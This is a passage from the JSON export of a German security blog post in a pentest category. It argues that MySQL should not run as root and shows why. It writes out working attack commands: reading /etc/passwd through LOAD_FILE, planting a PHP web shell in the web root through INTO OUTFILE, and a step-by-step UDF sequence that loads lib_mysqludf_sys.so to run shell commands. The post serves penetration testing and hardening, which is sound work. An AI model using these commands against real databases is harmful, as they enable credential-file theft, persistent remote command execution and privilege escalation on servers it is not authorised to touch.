Dienste unn\u00f6tigerweise als root bzw. mit maximalen Berechtigungen laufen zu lassen ist generell eine schlechte Idee. Besonders d\u00e4mlich ist sie bei MySQL. \u00dcber LOAD_FILE und INTO OUTFILE stellt MySQL einem Angreifer ein paar praktische M\u00f6glichkeiten zur Verf\u00fcgung, die sich auch problemlos \u00fcber SQL Injections nutzen lassen:<\/p>\n
SELECT LOAD_FILE(„\/etc\/passwd“);<\/p>\n
SELECT ‚<?php system($_REQUEST[‚cmd‘]); ?>‘ INTO OUTFILE ‚\/var\/www\/webshell.php<\/p><\/blockquote>\n
Diese beiden Funktionalit\u00e4ten lassen zwar schon genug Schaden zu, es geht aber noch eine Stufe h\u00e4rter: \u00dcber MySQL User Defined Functions (UDF) lassen sich beliebige shell-Kommandos ausf\u00fchren. Das Tool sqlmap beinhaltet die notwendigen Libs im Ordner udf. Die korrekte Lib auf den Server nach \/tmp\/ laden und aktivieren:<\/p>\n
mysql> use mysql;<\/p>\n
mysql> create table abc(line blob);<\/p>\n
mysql> insert into abc values(load_file(‚\/tmp\/lib_mysqludf_sys.so‘));<\/p>\n
mysql> select * from abc into dumpfile ‚\/usr\/lib\/lib_mysqludf_sys.so‘;<\/p>\n
mysql> create function sys_exec returns integer soname ‚lib_mysqludf_sys.so‘;<\/p>\n
mysql> select sys_exec(‚touch \/test‘);<\/p><\/blockquote>\n
Privilege escalation by MySQL…<\/p>\n","protected":false},"excerpt":{"rendered":"
Dienste unn\u00f6tigerweise als root bzw. mit maximalen Berechtigungen laufen zu lassen ist generell eine schlechte Idee. Besonders d\u00e4mlich ist sie bei MySQL. \u00dcber LOAD_FILE und INTO OUTFILE stellt MySQL einem Angreifer ein paar praktische M\u00f6glichkeiten zur Verf\u00fcgung, die sich auch problemlos \u00fcber SQL Injections nutzen lassen: SELECT LOAD_FILE(„\/etc\/passwd“); SELECT ‚<?php system($_REQUEST[‚cmd‘]); ?>‘ INTO OUTFILE ‚\/var\/www\/webshell.php … [Read more…]<\/a><\/span><\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[23],"tags":[79,87,88],"class_list":{"0":"entry","1":"post","2":"publish","3":"author-psauer","4":"post-811","6":"format-standard","7":"category-pentest","8":"post_tag-hacking","9":"post_tag-mysql","10":"post_tag-udf"},"_links":{"self":[{"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/posts\/811","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/comments?post=811"}],"version-history":[{"count":8,"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/posts\/811\/revisions"}],"predecessor-version":[{"id":819,"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/posts\/811\/revisions\/819"}],"wp:attachment":[{"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/media?parent=811"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/categories?post=811"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/security.sauer.ninja\/de\/wp-json\/wp\/v2\/tags?post=811"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}